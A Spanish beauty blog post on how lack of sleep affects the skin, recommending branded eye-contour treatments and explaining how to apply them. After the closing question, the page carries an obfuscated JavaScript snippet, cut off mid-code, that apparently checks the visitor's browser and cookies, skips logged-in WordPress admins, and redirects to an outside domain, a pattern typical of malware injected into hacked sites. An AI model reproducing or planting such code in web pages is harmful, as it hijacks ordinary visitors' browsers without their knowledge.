Dormir pocas horas pasa factura a nuestro estado de ánimo, pero también afecta considerablemente a nuestra piel. ¿Has notado últimamente sequedad, falta de luz o aparición de ojeras? En ese caso, deberás revisar tus hábitos, como la alimentación o la práctica de deporte. Sin embargo, la falta de tiempo y el ritmo vertiginoso que llevamos en las grandes ciudades nos obligan a no poder parar tan fácilmente y en ese caso ¡SOS, necesito ayuda! Tranquila, un buen tratamiento corrector te ayudará a tratar las ojeras, patas de gallo e incluso bolsas. Aquí te contamos cómo.

como-tratar-las-ojeras

¿Cuántas horas duermes?

En serio, si tuvieras que responder a esta pregunta qué número dirías. ¿Seis, ocho horas? En ese caso, tu descanso podría ser suficiente aunque no solo es importante el número de horas que duermes, también lo es que el sueño sea realmente reparador, y esto no en todos los casos es posible. Hijos que se despiertan por la noche, estrés o insomnio pueden resultar fatal para nuestra piel. Para las noches en las que no consigas descansar lo suficiente y te despiertes con la zona alrededor de los ojos más oscura, puedes usar Capture Youth de Dior, un tratamiento alisador e iluminador instantáneo que actúa directamente sobre bolsas, ojeras y arrugas, aportando un efecto más juvenil en la mirada.

¿Sabías que dormir boca arriba, apoyando la cabeza sobre una almohada, ayuda a que la circulación de la sangre drene mejor y no se acumule tanto líquido en la zona del contorno de ojos? De esa manera, al despertar los ojos estarán más despejados y calmados. Y si además consigues dormir ocho horas, ¡el efecto reparador será aún más intenso!

Es conveniente bajar el ritmo

Cuando la aparición de bolsas y ojeras es muy frecuente, debemos analizar si estamos llevando una vida demasiado sedentaria, si bebemos suficiente agua y si tenemos estrés. En ese caso, conviene parar, reflexionar, bajar un poco el ritmo y también aprovechar las noches para aplicarnos Advanced Night Repair Mask de Estée Lauder, una mascarilla para el contorno de ojos. Mientras tú descansas, ella actúa sobre esta delicada zona, protegiéndonos de la falta de sueño y de la contaminación.

prevencion-de-ojeras

También puedes aplicarte Mission Perfection de Clarins, que aclara y corrige las ojeras más rebeldes, incluso las de color azul o marrón que tanto oscurecen la mirada, protegiéndolas también de los rayos UV.

Un buen serum específico para esta zona es más que recomendable porque le proporciona a esta área la hidratación que necesita. El Glow Revival Eyes de Shiseido tiene ingredientes exclusivos para obtener una piel más uniforme y una tez más clara.

Cómo aplicar el contorno de ojos

tratamientos-anti-ojeras

Este producto debemos aplicarlo en la cuenca del ojo, no justo debajo del ojo. Es importante tener este punto claro para que el producto resulte realmente eficaz y por lo general, no debemos usarlo en la zona de los párpados. A la hora de extenderlo sobre la piel, aplica lo equivalente a un grano de arroz con la yema de los dedos y realiza pequeños masajes circulares desde la sien hacia la zona del lagrimal y viceversa. Después, da pequeños toques con las yemas de los dedos para que el producto quede perfectamente absorbido.

¿Qué truco de belleza tienes para atenuar las ojeras?

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone